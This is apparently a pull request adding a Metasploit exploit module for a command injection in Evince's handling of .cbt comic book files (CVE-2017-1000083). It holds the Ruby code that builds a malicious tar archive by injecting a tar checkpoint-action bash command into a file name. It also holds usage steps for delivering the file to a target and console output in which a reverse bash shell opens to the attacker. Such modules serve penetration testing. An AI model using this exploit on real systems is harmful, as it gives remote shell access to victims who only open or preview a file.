### PR TITLE
Add Evince CBT File Command Injection module

### DIFF
--- a/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md
+++ b/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md
@@ -1,0 +1,70 @@
+## Description
+
+  This module exploits a command injection vulnerability in Evince
+  before version 3.24.1 when opening comic book `.cbt` files.
+
+  Some file manager software, such as Nautilus and Atril, may allow
+  automatic exploitation without user interaction due to thumbnailer
+  preview functionality.
+
+  Note that limited space is available for the payload (<256 bytes).
+  Reverse Bash and Reverse Netcat payloads should be sufficiently small.
+
+
+## Vulnerable Application
+
+  [Evince](https://wiki.gnome.org/Apps/Evince) is a document viewer
+  for multiple document formats.
+
+  This module has been tested successfully on evince versions:
+
+  * 3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6
+  * 3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04
+
+
+## Verification Steps
+
+  1. ```use exploit/multi/fileformat/evince_cbt_cmd_injection```
+  2. ```set PAYLOAD <PAYLOAD>```
+  3. ```run```
+  4. The module should generate the malicious `cbt` file
+
+
+## Options
+
+  **FILENAME**
+
+  The cbt document file name (default: `msf.cbt`)
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection 
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set payload cmd/unix/reverse_bash
+  payload => cmd/unix/reverse_bash
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188
+  lhost => 172.16.191.188
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run
+
+  [*] Writing file: msf.cbt (1078272 bytes) ...
+  [+] msf.cbt stored at /root/.msf4/local/msf.cbt
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www
+  [*] exec: mv /root/.msf4/local/msf.cbt /var/www
+
+  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler 
+  msf5 exploit(multi/handler) > set payload cmd/unix/reverse_bash
+  payload => cmd/unix/reverse_bash
+  msf5 exploit(multi/handler) > set lhost 172.16.191.188
+  lhost => 172.16.191.188
+  msf5 exploit(multi/handler) > run
+
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Command shell session 1 opened (172.16.191.188:4444 -> 172.16.191.160:39362) at 2019-02-03 00:16:59 -0500
+
+  id
+  uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
+  uname -a
+  Linux ubuntu-16-04-x64 4.4.0-140-generic #166-Ubuntu SMP Wed Nov 14 20:09:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+  ```
+

--- a/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md
+++ b/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md
@@ -27,7 +27,10 @@
   1. ```use exploit/multi/fileformat/evince_cbt_cmd_injection```
   2. ```set PAYLOAD <PAYLOAD>```
   3. ```run```
-  4. The module should generate the malicious `cbt` file
+  4. The module should generate the malicious `msf.cbt` file
+  5. ```handler -p <PAYLOAD> -H <LHOST> -P <LPORT>```
+  6. Copy `msf.cbt` to target host and open with Evince
+  7. You should receive a new session
 
 
 ## Options
@@ -66,5 +69,15 @@
   uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
   uname -a
   Linux ubuntu-16-04-x64 4.4.0-140-generic #166-Ubuntu SMP Wed Nov 14 20:09:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
+  ```
+
+
+## Manual Cleanup
+
+To prevent re-exploitation from a thumbnailer process:
+
+  ```
+  /usr/bin/killall evince-thumbnailer
+  /usr/bin/killall atril-thumbnailer
   ```
 

--- a/modules/exploits/multi/fileformat/evince_cbt_cmd_injection.rb
+++ b/modules/exploits/multi/fileformat/evince_cbt_cmd_injection.rb
@@ -1,0 +1,108 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/zip'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Evince CBT File Command Injection',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability in Evince
+        before version 3.24.1 when opening comic book `.cbt` files.
+
+        Some file manager software, such as Nautilus and Atril, may allow
+        automatic exploitation without user interaction due to thumbnailer
+        preview functionality.
+
+        Note that limited space is available for the payload (<256 bytes).
+        Reverse Bash and Reverse Netcat payloads should be sufficiently small.
+
+        This module has been tested successfully on evince versions:
+
+        3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;
+        3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Felix Wilhelm',     # Discovery
+          'Sebastian Krahmer', # PoC
+          'Matlink',           # Exploit
+          'bcoles'             # Metasploit
+        ],
+      'References'     =>
+        [
+          ['BID', '99597'],
+          ['CVE', '2017-1000083'],
+          ['EDB', '45824'],
+          ['URL', 'https://seclists.org/oss-sec/2017/q3/128'],
+          ['URL', 'https://bugzilla.gnome.org/show_bug.cgi?id=784630'],
+          ['URL', 'https://bugzilla.suse.com/show_bug.cgi?id=1046856'],
+          ['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1735418'],
+          ['URL', 'https://bugs.launchpad.net/ubuntu/+source/atril/+bug/1800662'],
+          ['URL', 'https://access.redhat.com/security/cve/cve-2017-1000083'],
+          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2017-1000083']
+        ],
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Space'       => 215,
+          'BadChars'    => "\x00\x0a\x0d\x22",
+          'DisableNops' => true
+        },
+      'DefaultOptions'  =>
+        {
+          'PAYLOAD' => 'cmd/unix/reverse_netcat',
+          'DisablePayloadHandler' => true
+        },
+      'Targets'        => [[ 'Automatic', {}]],
+      'Privileged'     => false,
+      'DisclosureDate' => '2017-07-13',
+      'DefaultTarget'  => 0))
+    register_options([
+      OptString.new('FILENAME', [true, 'The cbt document file name', 'msf.cbt'])
+    ])
+  end
+
+  def exploit
+    ext = %w[png jpg gif]
+    path = " --checkpoint-action=exec=bash -c \"#{payload.encoded};\".#{ext.sample}"
+
+    # Tar archive max path length is 256.
+    if path.length > 256
+      fail_with Failure::PayloadFailed, "Payload is too large (#{path.length}): Max path length is 256 characters"
+    end
+
+    # Tar archive max file name length is 100.
+    path.split('/').each do |fname|
+      if fname.length > 100
+        fail_with Failure::PayloadFailed, "File name too long (#{fname.length}): Max filename length is 100 characters"
+      end
+    end
+
+    # Create malicious tar archive
+    tarfile = StringIO.new
+    Rex::Tar::Writer.new tarfile do |tar|
+      tar.add_file path, 0644 do |io|
+        io.write ''
+      end
+      # Pad file to 1+ MB to trigger tar checkpoint action
+      tar.add_file rand_text_alphanumeric(10..20), 0644 do |io|
+        io.write rand_text(1_000_000..1_100_000)
+      end
+    end
+    tarfile.rewind
+    cbt = tarfile.read
+
+    print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
+    file_create cbt
+  end
+end

--- a/modules/exploits/multi/fileformat/evince_cbt_cmd_injection.rb
+++ b/modules/exploits/multi/fileformat/evince_cbt_cmd_injection.rb
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'PAYLOAD' => 'cmd/unix/reverse_netcat',
+          'PAYLOAD' => 'cmd/unix/reverse_bash',
           'DisablePayloadHandler' => true
         },
       'Targets'        => [[ 'Automatic', {}]],


### PR DESCRIPTION
Add Evince CBT File Command Injection module.

        This module exploits a command injection vulnerability in Evince
        before version 3.24.1 when opening comic book `.cbt` files.

        Some file manager software, such as Nautilus and Atril, may allow
        automatic exploitation without user interaction due to thumbnailer
        preview functionality.

        Note that limited space is available for the payload (<256 bytes).
        Reverse Bash and Reverse Netcat payloads should be sufficiently small.

        This module has been tested successfully on evince versions:

        3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;
        3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.


### Output

  ```
  msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection 
  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set payload cmd/unix/reverse_bash
  payload => cmd/unix/reverse_bash
  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run

  [*] Writing file: msf.cbt (1078272 bytes) ...
  [+] msf.cbt stored at /root/.msf4/local/msf.cbt
  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www
  [*] exec: mv /root/.msf4/local/msf.cbt /var/www

  msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler 
  msf5 exploit(multi/handler) > set payload cmd/unix/reverse_bash
  payload => cmd/unix/reverse_bash
  msf5 exploit(multi/handler) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Command shell session 1 opened (172.16.191.188:4444 -> 172.16.191.160:39362) at 2019-02-03 00:16:59 -0500

  id
  uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
  uname -a
  Linux ubuntu-16-04-x64 4.4.0-140-generic #166-Ubuntu SMP Wed Nov 14 20:09:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
  ```
